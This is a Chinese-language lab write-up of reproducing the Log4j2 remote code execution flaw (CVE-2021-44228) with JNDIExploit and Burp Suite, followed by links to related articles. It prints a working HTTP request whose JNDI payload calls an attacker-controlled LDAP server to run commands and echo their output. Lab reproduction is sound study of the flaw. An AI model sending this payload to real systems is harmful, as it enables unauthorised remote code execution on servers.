Log4j2 RCE(CVE-2021-44228)漏洞复现

简介: Log4j2 RCE(CVE-2021-44228)漏洞复现笔记

准备环境

Log4j2这个漏洞是我第一次复现,因为还未学到javaweb方面的东西,就一直搁置着这个

项目文件下载

工具: JNDIExploit、burpsuite

首先把师傅给的项目文件运行一下

发现报错,这里有一行不完整,因为我也不清楚这里应该是什么就先忽略了。

忽略这行不完整的,可以正常运行

下面状态栏可以看到打开了8080端口,这应该就是漏洞存在的位置了。

打开后发现好像是404页面。我以为是我的问题,在这耽搁了比较久的时间。就去查找网上其他师傅们复现的文章和笔记。

在一篇文章中发现,之前那个404页面好像是正常运行之后的页面。

复现过程:

用JNDIExploit启动一个ldap的服务

这里发现HTTP服务无法开启,后来发现是端口冲突。换个端口就OK。

使用BP抓包工具构造一个请求

GET /hello HTTP/1.1
Host: 127.0.0.1:8080
Content-Type: application/x-www-form-urlencoded
Content-Length: 70
cmd: whoami
payload=${jndi:ldap://ip:1389/TomcatBypass/TomcatEcho}

看到这一步的时候发现之前忽略的项目内的一行,可能是请求内容中的最后一行的payload

将项目中的补充完整,重新运行。

BP发送构造的请求

可以看到回显。复现完成。

不足

在漏洞利用前应先验证漏洞是否存在,但是我根据教程中师傅的验证流程,使用dnslog没有验证成功:

总结

最后说一下这个漏洞的原理,引用其他师傅的一张图片

最后,注意到了项目中除了/hello这个路径,还有个/login

是通过POST方式传输username和password。猜想还有另外一种复现方法

参考文章:Apache Log4j2 RCE(CVE-2021-44228)漏洞复现

目录
相关文章
|
9月前
|
安全 Java 开发者
刚折腾完Log4J,又爆Spring RCE核弹级漏洞
继Log4J爆出安全漏洞之后,又在深夜,Spring的github上又更新了一条可能造成RCE(远程命令执行漏洞)的问题代码,随即在国内的安全圈炸开了锅。有安全专家建议升级到JDK 9以上,有些专家又建议回滚到JDK 7以下,一时间小伙伴们不知道该怎么办了。大家来看一段动画演示,怎么改都是“将军"。
83 1
|
域名解析 安全 Java
浅谈Log4j2之2.15.0版本RCE(二)
浅谈Log4j2之2.15.0版本RCE
128 0
浅谈Log4j2之2.15.0版本RCE(二)
|
域名解析 安全 网络协议
浅谈Log4j2之2.15.0版本RCE(一)
浅谈Log4j2之2.15.0版本RCE
242 0
浅谈Log4j2之2.15.0版本RCE(一)
|
云安全 安全 Java
Apache Log4j2从RCE到RC1绕过
Apache Log4j2从RCE到RC1绕过
79 0
Apache Log4j2从RCE到RC1绕过
|
安全 Java Apache
Log4j2 RCE漏洞及靶场搭建
Apache Log4j2是一款Java日志框架,是Log4j 的升级版。可以控制每一条日志的输出格式。通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。该漏洞是由于Apache Log4j2某些功能存在递归解析功能,攻击者可利用该漏洞在未授权的情况下,构造恶意数据进行远程代码执行攻击,最终获取服务器最高权限。
545 0
Log4j2 RCE漏洞及靶场搭建
|
安全 druid Java
史诗级无门槛利用!​Apache Log4j2 远程代码执行漏洞利用(CVE-2021-44228)
当前Apache Log4j2漏洞的影响极广,有消息称,截止到2021年12月13日仍存在RC1绕过的可能。所以,以检测与分析为目的,日志易安全团队对该漏洞进行复现,进而分析对应的攻击特征,形成SIEM与NTA检测规则。
242 1
史诗级无门槛利用!​Apache Log4j2 远程代码执行漏洞利用(CVE-2021-44228)
|
安全 前端开发 Java
检查你的项目有没有Apache Log4j2 RCE漏洞
12 月 10 日凌晨,Apache 开源项目 Log4j 的远程代码执行漏洞细节被公开,Apache Log4j 2.x <= 2.14.1 版本均回会受到影响。
检查你的项目有没有Apache Log4j2 RCE漏洞
|
安全 Java 测试技术
Apache Log4j 远程代码执行漏洞的响应 (CVE-2021-44228)--vCenter Server6.5实践--临时解决方案
Apache Log4j 远程代码执行漏洞的响应 (CVE-2021-44228)核弹级漏洞,在VMware补丁没出之前,根据官方临时缓解办法总结出的方案
486 0
Apache Log4j 远程代码执行漏洞的响应 (CVE-2021-44228)--vCenter Server6.5实践--临时解决方案
|
云安全 域名解析 安全
斩断Log4j2 RCE漏洞验证和利用链,主动外联管控你值得拥有
本文将介绍Apache Log4j2远程代码执行漏洞常见的验证、利用方式及其原理,并给出基于外联管控的防护方案。
1569 0
斩断Log4j2 RCE漏洞验证和利用链,主动外联管控你值得拥有
|
4天前
|
C++
JNI Log 日志输出
JNI Log 日志输出
13 1